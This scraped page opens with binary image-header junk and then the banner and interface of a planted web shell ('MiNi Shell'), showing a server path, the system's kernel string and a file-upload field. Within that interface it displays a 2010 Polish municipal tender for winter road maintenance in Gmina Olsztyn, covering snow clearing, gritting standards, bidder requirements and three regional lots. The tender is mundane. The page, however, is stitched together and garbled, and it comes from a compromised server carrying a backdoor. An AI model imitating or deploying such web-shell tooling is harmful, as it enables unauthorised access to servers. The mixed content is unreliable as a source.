JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/287785-N-2010.html

<p class="kh_header"><b>Olsztyn: Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym 2010/2011</b><br>
<b>Numer ogłoszenia: 287785 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olsztyn , Plac Piłsudskiego 10, 42-256 Olsztyn, woj. śląskie, tel. 034 3285077, faks 023 3285057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym 20010/2011       
o następującym charakterze:
a) odśnieżanie dróg gminnych, 
b) posypywanie dróg gminnych,
2.2. Całość zamówienia została podzielona na poszczególne - III  Rejony (części). 
2.4. Zaleca się, aby Wykonawca w celu zdobycia wszystkich informacji, które mogą być konieczne do prawidłowej wyceny wartość usługi zimowego utrzymania dróg dokonał wizji lokalnej tych dróg gminnych na których będzie ona przeprowadzona. Wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny  usługi. Wizja lokalna przeprowadzona jest na koszt Wykonawcy. 
2.5. Zimowe utrzymanie dróg i ulic gminnych ma na celu likwidacje zakłóceń ruch drogowego wywołanych takimi czynnikami atmosferycznymi jak śliskość zimowa oraz opady śniegu i musi być wykonane wg standardu:
a) jezdnia odśnieżona na całej szerokości /minimalna szerokość odśnieżania 4 m nie dopuszcza się występowania zasp śnieżnych, może występować warstwa zajeżdżonego śniegu o grubości nie utrudniającej ruchu: nie dopuszcza się występowania kolein głębszych niż 10 cm,
b) posypywanie piaskiem lub mieszanką piasku z solą w stosunku wagowym 80-20%  na bieżąco w miarę zaistniałych potrzeb (opady śniegu, mżawki)
c) do posypywania Wykonawca używa własnych materiałów  tj. piasku, soli drogowej lub innych środków dopuszczonych do stosowania przy usuwaniu gołoledzi i oblodzenia (Rozporządzenie Ministra Środowiska z dnia 27 X 2005 r. Dz. U. 05.230.1960
d) odśnieżanie, posypywanie realizowane poprzez użycie sprzętu mechanicznego tj. pługi, piaskarko-solarki, sprzęt ciężki  itp.
2.6. Realizując zakres zamówienia Wykonawca zobowiązany jest do :
a) prowadzenia stałych obserwacji warunków atmosferycznych i informowania Zamawiającego o potrzebie podjęcia działań dla odśnieżania dróg gminnych i  posypywania 
b)w przypadku wystąpienia złych warunków atmosferycznych  w ciągu godziny podjąć akcję odśnieżania, lub usuwania śliskości na drogach gminnych po telefonicznym ustaleniu z przedstawicielem Zamawiającego zakresu i rodzaju usług do wykonywania. 
c) odśnieżania lub posypywania do 4 godzin od zgłoszenia przez Zamawiającego 
d) całkowita likwidacja skutków pogarszania warunków atmosferycznych na drogach w ciągu 8 godzin od zaprzestania odpadów. 
e) dyżurowania przy telefonie przez cały czas realizacji umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować technicznie sprawnymi jednostkami sprzętowymi gwarantującymi efektywne prowadzenie akcji zimowej (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców ich potencjał techniczny będzie oceniany łącznie): 
Wymagana minimalna ilość jednostek sprzętowych: 
dla Części I -  Rejon 1:
a) min. 1 pług odśnieżny (pojazd + pług) 
b) min. 1 piaskarka solarka  lub sprzęt równoważny                                                     
c) sprzęt ciężki do odśnieżania (spycharka, równiarka, ładowarka)
dla Części 2-  Rejon 2:
a) min. 1 pług odśnieżny (pojazd + pług) 
b) min. 2 piaskarka solarka lub sprzęt równoważny                                                        
c) sprzęt ciężki do odśnieżania (spycharka, równiarka, ładowarka)                                                          
dla Części 3-  Rejon 3:
a) min. 1 pług odśnieżny (pojazd + pług)
b) min. 1 piaskarka solarka lub sprzęt równoważny                                                       
c) sprzęt ciężki do odśnieżania (spycharka, równiarka, ładowarka)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik    nr 1a,1b lub 1c  w zależności od części na którą jest złożona oferta
2. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu, oraz niepodlegania wykluczeniu na podstawie art.24 ust. 1 ustawy wymienione w pkt 7.1 oraz 7.2 niniejszej SIWZ 
3.Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej;
4.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w niżej wymienionym zakresie: 
a) ceny brutto na wykonanie zamówienia publicznego jedynie w przypadku zmiany urzędowej stawki podatku od towaru i usług 
b) zmian regulacji prawnych
c) zmian adresowych stron umowy określonych w umowie 
d) w przypadku zmian korzystnych Zleceniodawcy  
e) terminu realizacji usług
f) zmiany zakresu rzeczowego w przypadku, gdy zmiana ta wynika z okoliczności których Zleceniodawca nie mógł przewidzieć w chwili zawarcia umowy. 
g) danych objętych fakturą, w szczególności NIP-u, adresu, nazwy lub numeru rachunku Zleceniobiorcy w przypadku ich zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olsztyn.bip.jur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Olsztyn
Plac Marszałka Józefa Piłsudskiego 10, 42-256 Olsztyn
pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2010 godzina 10:00, miejsce: Urząd Gminy Olsztyn
Plac Marszałka Józefa Piłsudskiego 10, 42-256 Olsztyn
pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym  20010/2011 - Rejon nr 1
o następującym charakterze:
a) odśnieżanie dróg gminnych, 
b) posypywanie dróg gminnych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon nr 1 obejmuje następujące miejscowości: Olsztyn, Odrzykoń, Skrajnica, Kusięta, 
Zakładana ilość godzin odśnieżania dróg w sezonie  - 350 godzin
Zakładana ilość godzin posypywania dróg  w sezonie - 180 godzin
2.5. Zimowe utrzymanie dróg i ulic gminnych ma na celu likwidacje zakłóceń ruch drogowego wywołanych takimi czynnikami atmosferycznymi jak śliskość zimowa oraz opady śniegu i musi być wykonane wg standardu:
a) jezdnia odśnieżona na całej szerokości /minimalna szerokość odśnieżania 4 m , nie dopuszcza się występowania zasp śnieżnych, może występować warstwa zajeżdżonego śniegu o grubości nie utrudniającej ruchu: nie dopuszcza się występowania kolein głębszych niż 10 cm,
b) posypywanie piaskiem lub mieszanką piasku z solą w stosunku wagowym 80-20%  na bieżąco w miarę zaistniałych potrzeb (opady śniegu, mżawki)
c) do posypywania Wykonawca używa własnych materiałów  tj. piasku, soli drogowej lub innych środków dopuszczonych do stosowania przy usuwaniu gołoledzi i oblodzenia (Rozporządzenie Ministra Środowiska z dnia 27 X 2005 r. Dz. U. 05.230.1960
d) odśnieżanie, posypywanie realizowane poprzez użycie sprzętu mechanicznego tj. pługi, piaskarko-solarki, sprzęt ciężki  itp.

2.6. Realizując zakres zamówienia Wykonawca zobowiązany jest do :
a) prowadzenia stałych obserwacji warunków atmosferycznych i informowania Zamawiającego o potrzebie podjęcia działań dla odśnieżania dróg gminnych i  posypywania 
b) w przypadku wystąpienia złych warunków atmosferycznych  w ciągu godziny podjąć akcję odśnieżania, lub usuwania śliskości na drogach gminnych po telefonicznym ustaleniu z przedstawicielem Zamawiającego zakresu i rodzaju usług do wykonywania. 
c) odśnieżania lub posypywania do 4 godzin od zgłoszenia przez Zamawiającego 
d) całkowita likwidacja skutków pogarszania warunków atmosferycznych na drogach w ciągu 8 godzin od zaprzestania odpadów. 
e)dyżurowania przy telefonie przez cały czas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym 20010/2011 - Rejon nr 2
o następującym charakterze:
a) odśnieżanie dróg gminnych, 
b) posypywanie dróg gminnych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon nr 2 obejmuje następujące miejscowości: Turów, Przymiłowice, Bukowno 
Łączna długość dróg  dla rejonu 2 wynosi ok. 26 km
Zakładana ilość objazdów odśnieżania w sezonie 50 objazdów
Zakładana ilość objazdów posypywania w sezonie 45 objazdów
Zimowe utrzymanie dróg i ulic gminnych ma na celu likwidacje zakłóceń ruch 
        drogowego wywołanych takimi czynnikami atmosferycznymi jak śliskość zimowa oraz 
        opady śniegu i musi być wykonane wg standardu:
        a) jezdnia odśnieżona na całej szerokości /minimalna szerokość odśnieżania 4 m , nie  
          dopuszcza się występowania zasp śnieżnych, może występować warstwa zajeżdżonego 
          śniegu o grubości nie utrudniającej ruchu: nie dopuszcza się występowania kolein 
          głębszych niż 10 cm,
       b) posypywanie piaskiem lub mieszanką piasku z solą w stosunku wagowym 80-20%  na 
           bieżąco w miarę zaistniałych potrzeb (opady śniegu, mżawki)
       c) do posypywania Wykonawca używa własnych materiałów  tj. piasku, soli 
           drogowej lub innych środków dopuszczonych do stosowania przy usuwaniu 
           gołoledzi i oblodzenia (Rozporządzenie Ministra Środowiska z dnia 27 X 2005 r.  
           Dz. U. 05.230.1960
       d) odśnieżanie, posypywanie realizowane poprzez użycie sprzętu mechanicznego tj. pługi, 
            piaskarko-solarki, sprzęt ciężki  itp.

2.6. Realizując zakres zamówienia Wykonawca zobowiązany jest do :
a)	prowadzenia stałych obserwacji warunków atmosferycznych i informowania 
         Zamawiającego o potrzebie podjęcia działań dla odśnieżania dróg gminnych i  posypywania 
b)	w przypadku wystąpienia złych warunków atmosferycznych  w ciągu godziny podjąć 
         akcję odśnieżania, lub usuwania śliskości na drogach gminnych po telefonicznym 
         ustaleniu z przedstawicielem Zamawiającego zakresu i rodzaju usług do wykonywania. 
c)	odśnieżania lub posypywania do 4 godzin od zgłoszenia przez Zamawiającego 
d)	całkowita likwidacja skutków pogarszania warunków atmosferycznych na drogach w 
         ciągu 8 godzin od zaprzestania odpadów. 
e)	dyżurowania przy telefonie przez cały czas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg i ulic na terenie Gminy Olsztyn w sezonie zimowym  20010/2011 - Rejon nr 3
o następującym charakterze:
a) odśnieżanie dróg gminnych, 
b) posypywanie dróg gminnych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon nr 3 obejmuje następujące miejscowości: Zrębice I, II, Krasawa, Biskupice 
Łączna długość  dróg dla rejonu 3 wynosi ok. 16 km
Zakładana ilość objazdów odśnieżania w sezonie 50 objazdów
Zakładana ilość objazdów posypywania w sezonie  45 objazdów
2.5. Zimowe utrzymanie dróg i ulic gminnych ma na celu likwidacje zakłóceń ruch 
        drogowego wywołanych takimi czynnikami atmosferycznymi jak śliskość zimowa oraz 
        opady śniegu i musi być wykonane wg standardu:
        a) jezdnia odśnieżona na całej szerokości /minimalna szerokość odśnieżania 4 m , nie  
          dopuszcza się występowania zasp śnieżnych, może występować warstwa zajeżdżonego 
          śniegu o grubości nie utrudniającej ruchu: nie dopuszcza się występowania kolein 
          głębszych niż 10 cm,
       b) posypywanie piaskiem lub mieszanką piasku z solą w stosunku wagowym 80-20%  na 
           bieżąco w miarę zaistniałych potrzeb (opady śniegu, mżawki)
       c) do posypywania Wykonawca używa własnych materiałów  tj. piasku, soli 
           drogowej lub innych środków dopuszczonych do stosowania przy usuwaniu 
           gołoledzi i oblodzenia (Rozporządzenie Ministra Środowiska z dnia 27 X 2005 r.  
           Dz. U. 05.230.1960
       d) odśnieżanie, posypywanie realizowane poprzez użycie sprzętu mechanicznego tj. pługi, 
            piaskarko-solarki, sprzęt ciężki  itp.

2.6. Realizując zakres zamówienia Wykonawca zobowiązany jest do :
a)	prowadzenia stałych obserwacji warunków atmosferycznych i informowania 
         Zamawiającego o potrzebie podjęcia działań dla odśnieżania dróg gminnych i  posypywania 
b)	w przypadku wystąpienia złych warunków atmosferycznych  w ciągu godziny podjąć 
         akcję odśnieżania, lub usuwania śliskości na drogach gminnych po telefonicznym 
         ustaleniu z przedstawicielem Zamawiającego zakresu i rodzaju usług do wykonywania. 
c)	odśnieżania lub posypywania do 4 godzin od zgłoszenia przez Zamawiającego 
d)	całkowita likwidacja skutków pogarszania warunków atmosferycznych na drogach w 
         ciągu 8 godzin od zaprzestania odpadów. 
e)	dyżurowania przy telefonie przez cały czas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com